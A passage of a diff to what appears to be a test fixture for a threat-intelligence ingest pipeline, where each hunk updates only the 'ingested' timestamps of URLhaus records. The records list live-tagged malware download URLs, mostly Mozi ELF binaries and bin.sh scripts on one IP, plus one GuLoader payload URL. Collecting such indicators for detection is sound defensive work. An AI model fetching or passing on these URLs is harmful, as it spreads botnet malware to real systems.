listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11565,7 +11565,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026233400Z", + "ingested": "2021-12-14T14:56:15.726482484Z", "original": "{\"id\":\"961303\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961303/\",\"url\":\"http://89.160.20.156:57992/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11614,7 +11614,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026240400Z", + "ingested": "2021-12-14T14:56:15.726482950Z", "original": "{\"id\":\"961304\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961304/\",\"url\":\"http://89.160.20.156:43603/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11663,7 +11663,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026247200Z", + "ingested": "2021-12-14T14:56:15.726483304Z", "original": "{\"id\":\"961305\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961305/\",\"url\":\"http://89.160.20.156:37157/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11712,7 +11712,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026254200Z", + "ingested": "2021-12-14T14:56:15.726483677Z", "original": "{\"id\":\"961306\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961306/\",\"url\":\"http://89.160.20.156:37229/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11761,7 +11761,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026261400Z", + "ingested": "2021-12-14T14:56:15.726484305Z", "original": "{\"id\":\"961307\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961307/\",\"url\":\"http://89.160.20.156:49104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11810,7 +11810,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026268400Z", + "ingested": "2021-12-14T14:56:15.726484668Z", "original": "{\"id\":\"961308\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961308/\",\"url\":\"http://89.160.20.156:49575/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11859,7 +11859,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026275300Z", + "ingested": "2021-12-14T14:56:15.726485023Z", "original": "{\"id\":\"961299\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961299/\",\"url\":\"http://89.160.20.156:50000/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11908,7 +11908,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026282200Z", + "ingested": "2021-12-14T14:56:15.726485375Z", "original": "{\"id\":\"961300\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961300/\",\"url\":\"http://89.160.20.156:36251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11957,7 +11957,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026289200Z", + "ingested": "2021-12-14T14:56:15.726485874Z", "original": "{\"id\":\"961301\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961301/\",\"url\":\"http://89.160.20.156:51932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12006,7 +12006,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026296300Z", + "ingested": "2021-12-14T14:56:15.726486233Z", "original": "{\"id\":\"961297\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961297/\",\"url\":\"http://89.160.20.156:45660/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12055,7 +12055,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026304700Z", + "ingested": "2021-12-14T14:56:15.726486585Z", "original": "{\"id\":\"961298\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961298/\",\"url\":\"http://89.160.20.156:42478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12104,7 +12104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026311800Z", + "ingested": "2021-12-14T14:56:15.726486941Z", "original": "{\"id\":\"961296\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961296/\",\"url\":\"http://89.160.20.156:50726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12153,7 +12153,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026318700Z", + "ingested": "2021-12-14T14:56:15.726487378Z", "original": "{\"id\":\"961295\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961295/\",\"url\":\"http://89.160.20.156:40256/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:33:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -12203,7 +12203,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026325600Z", + "ingested": "2021-12-14T14:56:15.726487831Z", "original": "{\"id\":\"961294\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961294/\",\"url\":\"http://89.160.20.156:50971/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:29:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -12250,7 +12250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026332500Z", + "ingested": "2021-12-14T14:56:15.726488260Z", "original": "{\"id\":\"961293\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961293/\",\"url\":\"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin\",\"url_status\":\"online\",\"host\":\"realestatederivatives.com.ng\",\"date_added\":\"2021-01-14 19:24:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -12299,7 +12299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026339400Z", + "ingested": "2021-12-14T14:56:15.726488619Z", "original": "{\"id\":\"961291\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961291/\",\"url\":\"http://89.160.20.156:33946/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12348,7 +12348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026346300Z", + "ingested": "2021-12-14T14:56:15.726488980Z", "original": "{\"id\":\"961292\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961292/\",\"url\":\"http://89.160.20.156:39990/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12397,7 +12397,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026353200Z", + "ingested": "2021-12-14T14:56:15.726489447Z", "original": "{\"id\":\"961288\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961288/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12446,7 +12446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026360300Z", + "ingested": "2021-12-14T14:56:15.726489798Z", "original": "{\"id\":\"961289\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961289/\",\"url\":\"http://89.160.20.156:32989/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12495,7 +12495,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026367300Z", + "ingested": "2021-12-14T14:56:15.726490261Z", "original": "{\"id\":\"961290\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961290/\",\"url\":\"http://89.160.20.156:52458/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12544,7 +12544,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026374200Z", + "ingested": "2021-12-14T14:56:15.726490620Z", "original": "{\"id\":\"961286\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961286/\",\"url\":\"http://89.160.20.156:60735/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12593,7 +12593,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026381100Z", + "ingested": "2021-12-14T14:56:15.726490977Z", "original": "{\"id\":\"961287\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961287/\",\"url\":\"http://89.160.20.156:34755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12642,7 +12642,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026388Z", + "ingested": "2021-12-14T14:56:15.726491344Z", "original": "{\"id\":\"961285\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961285/\",\"url\":\"http://89.160.20.156:39290/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12691,7 +12691,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026394900Z", + "ingested": "2021-12-14T14:56:15.726491720Z", "original": "{\"id\":\"961279\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961279/\",\"url\":\"http://89.160.20.156:56141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12740,7 +12740,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026401900Z", + "ingested": "2021-12-14T14:56:15.726492073Z", "original": "{\"id\":\"961280\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961280/\",\"url\":\"http://89.160.20.156:40247/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12789,7 +12789,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026408800Z", + "ingested": "2021-12-14T14:56:15.726492428Z", "original": "{\"id\":\"961281\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961281/\",\"url\":\"http://89.160.20.156:36619/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -12838,7 +12838,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026415700Z", + "ingested": "2021-12-14T14:56:15.726492800Z", "original": "{\"id\":\"961282\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961282/\",\"url\":\"http://89.160.20.156:43673/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12887,7 +12887,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026422500Z", + "ingested": "2021-12-14T14:56:15.726493224Z", "original": "{\"id\":\"961283\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961283/\",\"url\":\"http://89.160.20.156:55726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12936,7 +12936,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026429400Z", + "ingested": "2021-12-14T14:56:15.726493590Z", "original": "{\"id\":\"961284\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961284/\",\"url\":\"http://89.160.20.156:59668/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12985,7 +12985,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026436300Z", + "ingested": "2021-12-14T14:56:15.726493938Z", "original": "{\"id\":\"961278\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961278/\",\"url\":\"http://89.160.20.156:34391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13034,7 +13034,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026443400Z", + "ingested": "2021-12-14T14:56:15.726494297Z", "original": "{\"id\":\"961277\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961277/\",\"url\":\"http://89.160.20.156:49478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13083,7 +13083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026450300Z", + "ingested": "2021-12-14T14:56:15.726494802Z", "original": "{\"id\":\"961276\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961276/\",\"url\":\"http://89.160.20.156:54670/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13132,7 +13132,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026457200Z", + "ingested": "2021-12-14T14:56:15.726495161Z", "original": "{\"id\":\"961270\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961270/\",\"url\":\"http://89.160.20.156:59599/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13181,7 +13181,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026464100Z", + "ingested": "2021-12-14T14:56:15.726495516Z", "original": "{\"id\":\"961271\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961271/\",\"url\":\"http://89.160.20.156:45189/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13230,7 +13230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026471100Z", + "ingested": "2021-12-14T14:56:15.726495864Z", "original": "{\"id\":\"961272\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961272/\",\"url\":\"http://89.160.20.156:60805/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13279,7 +13279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026478Z", + "ingested": "2021-12-14T14:56:15.726496587Z", "original": "{\"id\":\"961273\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961273/\",\"url\":\"http://89.160.20.156:38888/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13328,7 +13328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026484900Z", + "ingested": "2021-12-14T14:56:15.726497102Z", "original": "{\"id\":\"961274\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961274/\",\"url\":\"http://89.160.20.156:47869/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13377,7 +13377,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026491900Z", + "ingested": "2021-12-14T14:56:15.726497461Z", "original": "{\"id\":\"961275\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961275/\",\"url\":\"http://89.160.20.156:57478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13427,7 +13427,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026498800Z", + "ingested": "2021-12-14T14:56:15.726497832Z", "original": "{\"id\":\"961269\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961269/\",\"url\":\"http://89.160.20.156:40256/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -13476,7 +13476,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026505700Z", + "ingested": "2021-12-14T14:56:15.726498187Z", "original": "{\"id\":\"961268\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961268/\",\"url\":\"http://89.160.20.156:49035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13525,7 +13525,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026512800Z", + "ingested": "2021-12-14T14:56:15.726498647Z", "original": "{\"id\":\"961266\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961266/\",\"url\":\"http://89.160.20.156:41531/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13574,7 +13574,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026519800Z", + "ingested": "2021-12-14T14:56:15.726499003Z", "original": "{\"id\":\"961267\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961267/\",\"url\":\"http://89.160.20.156:49596/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13623,7 +13623,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026526700Z", + "ingested": "2021-12-14T14:56:15.726499354Z", "original": "{\"id\":\"961265\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961265/\",\"url\":\"http://89.160.20.156:43584/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13672,7 +13672,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026533500Z", + "ingested": "2021-12-14T14:56:15.726499765Z", "original": "{\"id\":\"961264\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961264/\",\"url\":\"http://89.160.20.156:44976/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 